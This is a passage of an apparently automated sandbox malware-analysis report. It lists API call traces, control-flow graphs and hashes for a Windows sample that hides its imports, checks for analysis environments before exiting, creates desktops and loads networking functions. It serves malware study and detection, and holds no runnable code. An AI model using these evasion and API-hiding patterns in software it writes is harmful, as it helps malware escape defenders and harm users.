2186->2187 2188 401d46-401d54 lstrcpy lstrcat 2186->2188 2193 401d9a-401db4 lstrlen call 3e2930 2187->2193 2194 401d7d-401d7f 2187->2194 2188->2187 2199 401db6-401db8 2193->2199 2200 401dce-401deb call 402a40 lstrlen call 3e2930 2193->2200 2194->2193 2196 401d81-401d85 2194->2196 2196->2193 2198 401d87-401d94 lstrcpy lstrcat 2196->2198 2198->2193 2199->2200 2201 401dba-401dc8 lstrcpy lstrcat 2199->2201 2206 401e0a-401e0f 2200->2206 2207 401ded-401def 2200->2207 2201->2200 2209 401e11 call 3e2a20 2206->2209 2210 401e16-401e22 call 3e2930 2206->2210 2207->2206 2208 401df1-401df5 2207->2208 2208->2206 2212 401df7-401e04 lstrcpy lstrcat 2208->2212 2209->2210 2215 401e30-401e66 call 3e2a20 * 5 OpenEventA 2210->2215 2216 401e24-401e26 2210->2216 2212->2206 2228 401e68-401e8a CloseHandle Sleep OpenEventA 2215->2228 2229 401e8c-401ea0 CreateEventA call 401b20 call 3fffd0 2215->2229 2216->2215 2217 401e28-401e2a lstrcpy 2216->2217 2217->2215 2228->2228 2228->2229 2233 401ea5-401eae CloseHandle ExitProcess 2229->2233
                                  APIs
                                    • Part of subcall function 00406390: GetProcAddress.KERNEL32(76210000,011A17C0), ref: 004063E9
                                    • Part of subcall function 00406390: GetProcAddress.KERNEL32(76210000,011A1778), ref: 00406402
                                    • Part of subcall function 00406390: GetProcAddress.KERNEL32(76210000,011A16A0), ref: 0040641A
                                    • Part of subcall function 00406390: GetProcAddress.KERNEL32(76210000,011A16B8), ref: 00406432
                                    • Part of subcall function 00406390: GetProcAddress.KERNEL32(76210000,011A8B78), ref: 0040644B
                                    • Part of subcall function 00406390: GetProcAddress.KERNEL32(76210000,01196698), ref: 00406463
                                    • Part of subcall function 00406390: GetProcAddress.KERNEL32(76210000,01196658), ref: 0040647B
                                    • Part of subcall function 00406390: GetProcAddress.KERNEL32(76210000,011A1718), ref: 00406494
                                    • Part of subcall function 00406390: GetProcAddress.KERNEL32(76210000,011A16D0), ref: 004064AC
                                    • Part of subcall function 00406390: GetProcAddress.KERNEL32(76210000,011A17F0), ref: 004064C4
                                    • Part of subcall function 00406390: GetProcAddress.KERNEL32(76210000,011A1700), ref: 004064DD
                                    • Part of subcall function 00406390: GetProcAddress.KERNEL32(76210000,01196718), ref: 004064F5
                                    • Part of subcall function 00406390: GetProcAddress.KERNEL32(76210000,011A1748), ref: 0040650D
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 00401C2F
                                  • ExitProcess.KERNEL32 ref: 00401C67
                                  • GetSystemInfo.KERNEL32(?), ref: 00401C71
                                  • ExitProcess.KERNEL32 ref: 00401C7F
                                    • Part of subcall function 003E1030: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 003E1046
                                    • Part of subcall function 003E1030: VirtualAllocExNuma.KERNEL32(00000000), ref: 003E104D
                                    • Part of subcall function 003E1030: ExitProcess.KERNEL32 ref: 003E1058
                                    • Part of subcall function 003E10C0: GlobalMemoryStatusEx.KERNEL32 ref: 003E10EA
                                    • Part of subcall function 003E10C0: ExitProcess.KERNEL32 ref: 003E1114
                                  • GetUserDefaultLangID.KERNEL32 ref: 00401C8F
                                  • ExitProcess.KERNEL32 ref: 00401CB2
                                  • ExitProcess.KERNEL32 ref: 00401CE1
                                  • lstrlen.KERNEL32(011A8AD8), ref: 00401CEE
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00401D15
                                  • lstrcat.KERNEL32(00000000,011A8AD8), ref: 00401D1D
                                  • lstrlen.KERNEL32(00414B98), ref: 00401D28
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00401D48
                                  • lstrcat.KERNEL32(00000000,00414B98), ref: 00401D54
                                  • lstrlen.KERNEL32(00000000), ref: 00401D63
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00401D89
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00401D94
                                  • lstrlen.KERNEL32(00414B98), ref: 00401D9F
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00401DBC
                                  • lstrcat.KERNEL32(00000000,00414B98), ref: 00401DC8
                                  • lstrlen.KERNEL32(00000000), ref: 00401DD7
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00401DF9
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00401E04
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$Process$Exitlstrcpy$lstrcatlstrlen$AllocCurrentDefaultGlobalInfoLangMemoryNumaStatusSystemUserVirtual
                                  • String ID:
                                  • API String ID: 3366406952-0
                                  • Opcode ID: b377ce69c6db294a7431d896ed45ca84488d64ae1a5fa3604c7761b70bdd4126
                                  • Instruction ID: 2f4dea81dcd154b73f57f6e9255346187af6eaf0a8ea54750c3e4193a45f137a
                                  • Opcode Fuzzy Hash: b377ce69c6db294a7431d896ed45ca84488d64ae1a5fa3604c7761b70bdd4126
                                  • Instruction Fuzzy Hash: 2471B731540215AFD721ABB1DC4DBAF367AAF44741F08913AF906A72E1DF78E901CB64
                                  Function 003E4A60 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 119memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2850 3e4a60-3e4afc RtlAllocateHeap 2867 3e4afe-3e4b03 2850->2867 2868 3e4b7a-3e4bbe VirtualProtect 2850->2868 2869 3e4b06-3e4b78 2867->2869 2869->2868
                                  APIs
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 003E4AA2
                                  • VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 003E4BB0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeapProtectVirtual
                                  • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                  • API String ID: 1542196881-3329630956
                                  • Opcode ID: f9c1527e12aaf588a7e85b5b68a6e7083cb9e3a818d2c42a28dbde8d1ac8a2e5
                                  • Instruction ID: b01273db38b7b99281092c41a44612a0aeb843680016f17061445e5f8026539b
                                  • Opcode Fuzzy Hash: f9c1527e12aaf588a7e85b5b68a6e7083cb9e3a818d2c42a28dbde8d1ac8a2e5
                                  • Instruction Fuzzy Hash: 3131F8B8BA022C769620EBFF4C47FDF6E55DFC5B60B21405375087B180C9A95680CAAA
                                  Function 00402A40 Relevance: 4.5, APIs: 3, Instructions: 33memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00402A6F
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00402A76
                                  • GetUserNameA.ADVAPI32(00000000,00000104), ref: 00402A8A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateNameProcessUser
                                  • String ID:
                                  • API String ID: 1296208442-0
                                  • Opcode ID: 2763dc03a11714edd128675ad5adc4041c2c70b80c6238f3595e2d5dd204c87e
                                  • Instruction ID: c10538853dd1005a3df4342557b5d3a6b44513e3e9914ac91ab69eea21aba3c2
                                  • Opcode Fuzzy Hash: 2763dc03a11714edd128675ad5adc4041c2c70b80c6238f3595e2d5dd204c87e
                                  • Instruction Fuzzy Hash: DCF0B4B1A40204AFC700DF88DD49B9EBBBCF708B21F10022BF915E3280D774190487A1
                                  Function 004066E0 Relevance: 210.7, APIs: 115, Strings: 5, Instructions: 696libraryloaderCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 633 4066e0-4066e7 634 4066ed-406af9 GetProcAddress * 43 633->634 635 406afe-406b92 LoadLibraryA * 8 633->635 634->635 636 406b94-406c03 GetProcAddress * 5 635->636 637 406c08-406c0f 635->637 636->637 638 406cd2-406cd9 637->638 639 406c15-406ccd GetProcAddress * 8 637->639 640 406cdb-406d4a GetProcAddress * 5 638->640 641 406d4f-406d56 638->641 639->638 640->641 642 406de9-406df0 641->642 643 406d5c-406de4 GetProcAddress * 6 641->643 644 406f10-406f17 642->644 645 406df6-406f0b GetProcAddress * 12 642->645 643->642 646 406f19-406f88 GetProcAddress * 5 644->646 647 406f8d-406f94 644->647 645->644 646->647 648 406fc1-406fc8 647->648 649 406f96-406fbc GetProcAddress * 2 647->649 650 406ff5-406ffc 648->650 651 406fca-406ff0 GetProcAddress * 2 648->651 649->648 652 407002-4070e8 GetProcAddress * 10 650->652 653 4070ed-4070f4 650->653 651->650 652->653 654 407152-407159 653->654 655 4070f6-40714d GetProcAddress * 4 653->655 656 40715b-407169 GetProcAddress 654->656 657 40716e-407175 654->657 655->654 656->657 658 4071d3 657->658 659 407177-4071ce GetProcAddress * 4 657->659 659->658
                                  APIs
                                  • GetProcAddress.KERNEL32(76210000,01196518), ref: 004066F5
                                  • GetProcAddress.KERNEL32(76210000,011964D8), ref: 0040670D
                                  • GetProcAddress.KERNEL32(76210000,011A8F40), ref: 00406726
                                  • GetProcAddress.KERNEL32(76210000,011A8CE8), ref: 0040673E
                                  • GetProcAddress.KERNEL32(76210000,011A8D18), ref: 00406756
                                  • GetProcAddress.KERNEL32(76210000,011AF080), ref: 0040676F
                                  • GetProcAddress.KERNEL32(76210000,0119A6C0), ref: 00406787
                                  • GetProcAddress.KERNEL32(76210000,011AEFC0), ref: 0040679F
                                  • GetProcAddress.KERNEL32(76210000,011AEF30), ref: 004067B8
                                  • GetProcAddress.KERNEL32(76210000,011AF008), ref: 004067D0
                                  • GetProcAddress.KERNEL32(76210000,011AF0B0), ref: 004067E8
                                  • GetProcAddress.KERNEL32(76210000,011967D8), ref: 00406801
                                  • GetProcAddress.KERNEL32(76210000,011964F8), ref: 00406819
                                  • GetProcAddress.KERNEL32(76210000,011966D8), ref: 00406831
                                  • GetProcAddress.KERNEL32(76210000,01196578), ref: 0040684A
                                  • GetProcAddress.KERNEL32(76210000,011AEF90), ref: 00406862
                                  • GetProcAddress.KERNEL32(76210000,011AEFD8), ref: 0040687A
                                  • GetProcAddress.KERNEL32(76210000,0119A620), ref: 00406893
                                  • GetProcAddress.KERNEL32(76210000,01196738), ref: 004068AB
                                  • GetProcAddress.KERNEL32(76210000,011AEFF0), ref: 004068C3
                                  • GetProcAddress.KERNEL32(76210000,011AEF48), ref: 004068DC
                                  • GetProcAddress.KERNEL32(76210000,011AF020), ref: 004068F4
                                  • GetProcAddress.KERNEL32(76210000,011AF0C8), ref: 0040690C
                                  • GetProcAddress.KERNEL32(76210000,01196758), ref: 00406925
                                  • GetProcAddress.KERNEL32(76210000,011AF098), ref: 0040693D
                                  • GetProcAddress.KERNEL32(76210000,011AEFA8), ref: 00406955
                                  • GetProcAddress.KERNEL32(76210000,011AF0E0), ref: 0040696E
                                  • GetProcAddress.KERNEL32(76210000,011AF038), ref: 00406986
                                  • GetProcAddress.KERNEL32(76210000,011AEF60), ref: 0040699E
                                  • GetProcAddress.KERNEL32(76210000,011AF050), ref: 004069B7
                                  • GetProcAddress.KERNEL32(76210000,011AEF78), ref: 004069CF
                                  • GetProcAddress.KERNEL32(76210000,011AF068), ref: 004069E7
                                  • GetProcAddress.KERNEL32(76210000,011AEB40), ref: 00406A00
                                  • GetProcAddress.KERNEL32(76210000,0119FE58), ref: 00406A18
                                  • GetProcAddress.KERNEL32(76210000,011AEB10), ref: 00406A30
                                  • GetProcAddress.KERNEL32(76210000,011AEA38), ref: 00406A49
                                  • GetProcAddress.KERNEL32(76210000,011967B8), ref: 00406A61
                                  • GetProcAddress.KERNEL32(76210000,011AEBB8), ref: 00406A79
                                  • GetProcAddress.KERNEL32(76210000,01196538), ref: 00406A92
                                  • GetProcAddress.KERNEL32(76210000,011AE960), ref: 00406AAA
                                  • GetProcAddress.KERNEL32(76210000,011AE9D8), ref: 00406AC2
                                  • GetProcAddress.KERNEL32(76210000,011965B8), ref: 00406ADB
                                  • GetProcAddress.KERNEL32(76210000,011965D8), ref: 00406AF3
                                  • LoadLibraryA.KERNEL32(011AEBD0,0040051F), ref: 00406B05
                                  • LoadLibraryA.KERNEL32(011AE978), ref: 00406B16
                                  • LoadLibraryA.KERNEL32(011AEB88), ref: 00406B28
                                  • LoadLibraryA.KERNEL32(011AEBA0), ref: 00406B3A
                                  • LoadLibraryA.KERNEL32(011AE990), ref: 00406B4B
                                  • LoadLibraryA.KERNEL32(011AE9C0), ref: 00406B5D
                                  • LoadLibraryA.KERNEL32(011AEC18), ref: 00406B6F
                                  • LoadLibraryA.KERNEL32(011AE9A8), ref: 00406B80
                                  • GetProcAddress.KERNEL32(751E0000,011963F8), ref: 00406B9C
                                  • GetProcAddress.KERNEL32(751E0000,011AEB70), ref: 00406BB4
                                  • GetProcAddress.KERNEL32(751E0000,011A8BD8), ref: 00406BCD
                                  • GetProcAddress.KERNEL32(751E0000,011AEA50), ref: 00406BE5
                                  • GetProcAddress.KERNEL32(751E0000,01196438), ref: 00406BFD
                                  • GetProcAddress.KERNEL32(70170000,0119A8C8), ref: 00406C1D
                                  • GetProcAddress.KERNEL32(70170000,01196318), ref: 00406C35
                                  • GetProcAddress.KERNEL32(70170000,0119A648), ref: 00406C4E
                                  • GetProcAddress.KERNEL32(70170000,011AE9F0), ref: 00406C66
                                  • GetProcAddress.KERNEL32(70170000,011AEA08), ref: 00406C7E
                                  • GetProcAddress.KERNEL32(70170000,01196458), ref: 00406C97
                                  • GetProcAddress.KERNEL32(70170000,01196298), ref: 00406CAF
                                  • GetProcAddress.KERNEL32(70170000,011AEC00), ref: 00406CC7
                                  • GetProcAddress.KERNEL32(753A0000,01196118), ref: 00406CE3
                                  • GetProcAddress.KERNEL32(753A0000,011964B8), ref: 00406CFB
                                  • GetProcAddress.KERNEL32(753A0000,011AEBE8), ref: 00406D14
                                  • GetProcAddress.KERNEL32(753A0000,011AEA20), ref: 00406D2C
                                  • GetProcAddress.KERNEL32(753A0000,01196478), ref: 00406D44
                                  • GetProcAddress.KERNEL32(76310000,0119A940), ref: 00406D64
                                  • GetProcAddress.KERNEL32(76310000,0119A7B0), ref: 00406D7C
                                  • GetProcAddress.KERNEL32(76310000,011AEAF8), ref: 00406D95
                                  • GetProcAddress.KERNEL32(76310000,011960D8), ref: 00406DAD
                                  • GetProcAddress.KERNEL32(76310000,01196378), ref: 00406DC5
                                  • GetProcAddress.KERNEL32(76310000,0119A968), ref: 00406DDE
                                  • GetProcAddress.KERNEL32(76910000,011AEAE0), ref: 00406DFE
                                  • GetProcAddress.KERNEL32(76910000,01196178), ref: 00406E16
                                  • GetProcAddress.KERNEL32(76910000,011A8C68), ref: 00406E2F
                                  • GetProcAddress.KERNEL32(76910000,011AEB58), ref: 00406E47
                                  • GetProcAddress.KERNEL32(76910000,011AE930), ref: 00406E5F
                                  • GetProcAddress.KERNEL32(76910000,011962B8), ref: 00406E78
                                  • GetProcAddress.KERNEL32(76910000,011961D8), ref: 00406E90
                                  • GetProcAddress.KERNEL32(76910000,011AEA98), ref: 00406EA8
                                  • GetProcAddress.KERNEL32(76910000,011AE948), ref: 00406EC1
                                  • GetProcAddress.KERNEL32(76910000,CreateDesktopA), ref: 00406ED7
                                  • GetProcAddress.KERNEL32(76910000,OpenDesktopA), ref: 00406EEE
                                  • GetProcAddress.KERNEL32(76910000,CloseDesktop), ref: 00406F05
                                  • GetProcAddress.KERNEL32(75B30000,01196198), ref: 00406F21
                                  • GetProcAddress.KERNEL32(75B30000,011AEA68), ref: 00406F39
                                  • GetProcAddress.KERNEL32(75B30000,011AEB28), ref: 00406F52
                                  • GetProcAddress.KERNEL32(75B30000,011AEA80), ref: 00406F6A
                                  • GetProcAddress.KERNEL32(75B30000,011AEAB0), ref: 00406F82
                                  • GetProcAddress.KERNEL32(75670000,011961F8), ref: 00406F9E
                                  • GetProcAddress.KERNEL32(75670000,01196418), ref: 00406FB6
                                  • GetProcAddress.KERNEL32(76AC0000,011960F8), ref: 00406FD2
                                  • GetProcAddress.KERNEL32(76AC0000,011AEAC8), ref: 00406FEA
                                  • GetProcAddress.KERNEL32(6F4E0000,01196498), ref: 0040700A
                                  • GetProcAddress.KERNEL32(6F4E0000,01196398), ref: 00407022
                                  • GetProcAddress.KERNEL32(6F4E0000,01196338), ref: 0040703B
                                  • GetProcAddress.KERNEL32(6F4E0000,011AEF18), ref: 00407053
                                  • GetProcAddress.KERNEL32(6F4E0000,011961B8), ref: 0040706B
                                  • GetProcAddress.KERNEL32(6F4E0000,01196218), ref: 00407084
                                  • GetProcAddress.KERNEL32(6F4E0000,011962F8), ref: 0040709C
                                  • GetProcAddress.KERNEL32(6F4E0000,011963D8), ref: 004070B4
                                  • GetProcAddress.KERNEL32(6F4E0000,InternetSetOptionA), ref: 004070CB
                                  • GetProcAddress.KERNEL32(6F4E0000,HttpQueryInfoA), ref: 004070E2
                                  • GetProcAddress.KERNEL32(75AE0000,011AEE10), ref: 004070FE
                                  • GetProcAddress.KERNEL32(75AE0000,011A8C28), ref: 00407116
                                  • GetProcAddress.KERNEL32(75AE0000,011AEE58), ref: 0040712F
                                  • GetProcAddress.KERNEL32(75AE0000,011AECA8), ref: 00407147
                                  • GetProcAddress.KERNEL32(76300000,01196138), ref: 00407163
                                  • GetProcAddress.KERNEL32(6E950000,011AEC30), ref: 0040717F
                                  • GetProcAddress.KERNEL32(6E950000,01196158), ref: 00407197
                                  • GetProcAddress.KERNEL32(6E950000,011AED38), ref: 004071B0
                                  • GetProcAddress.KERNEL32(6E950000,011AEDF8), ref: 004071C8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: CloseDesktop$CreateDesktopA$HttpQueryInfoA$InternetSetOptionA$OpenDesktopA
                                  • API String ID: 2238633743-3468015613
                                  • Opcode ID: ff89fa2fecd0eab2d02de931896702a2f54c975076d6e5443439f3b3a07553b0
                                  • Instruction ID: 4356d31b1ffc5f649f3fdf46d476b227c3fbb1c5134d47668a57121c3a8cac3d
                                  • Opcode Fuzzy Hash: ff89fa2fecd0eab2d02de931896702a2f54c975076d6e5443439f3b3a07553b0
                                  • Instruction Fuzzy Hash: 44626FB5A10200AFD754DF65ECA8AA637BBF78D746318E92FE91583360DB349841DB30
                                  Function 003FF1B0 Relevance: 102.7, APIs: 57, Strings: 1, Instructions: 1156stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrlen.KERNEL32(0040CFEC), ref: 003FF1D5
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003FF1F1
                                  • lstrlen.KERNEL32(0040CFEC), ref: 003FF1FC
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003FF215
                                  • lstrlen.KERNEL32(0040CFEC), ref: 003FF220
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003FF239
                                  • lstrcpy.KERNEL32(00000000,00414FA0), ref: 003FF25E
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003FF28C
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003FF2C0
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003FF2F0
                                  • lstrlen.KERNEL32(01196798), ref: 003FF315
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen
                                  • String ID: ERROR
                                  • API String ID: 367037083-2861137601
                                  • Opcode ID: b930a3216fbe5d38116a69d6a4b990c00cf28654999faabd89b5afcacdd663fd
                                  • Instruction ID: 1d5daeb5c0c09b1494e8eb10c0058f7e4850e78093c5de2b7bd2c411db7ce6ec
                                  • Opcode Fuzzy Hash: b930a3216fbe5d38116a69d6a4b990c00cf28654999faabd89b5afcacdd663fd
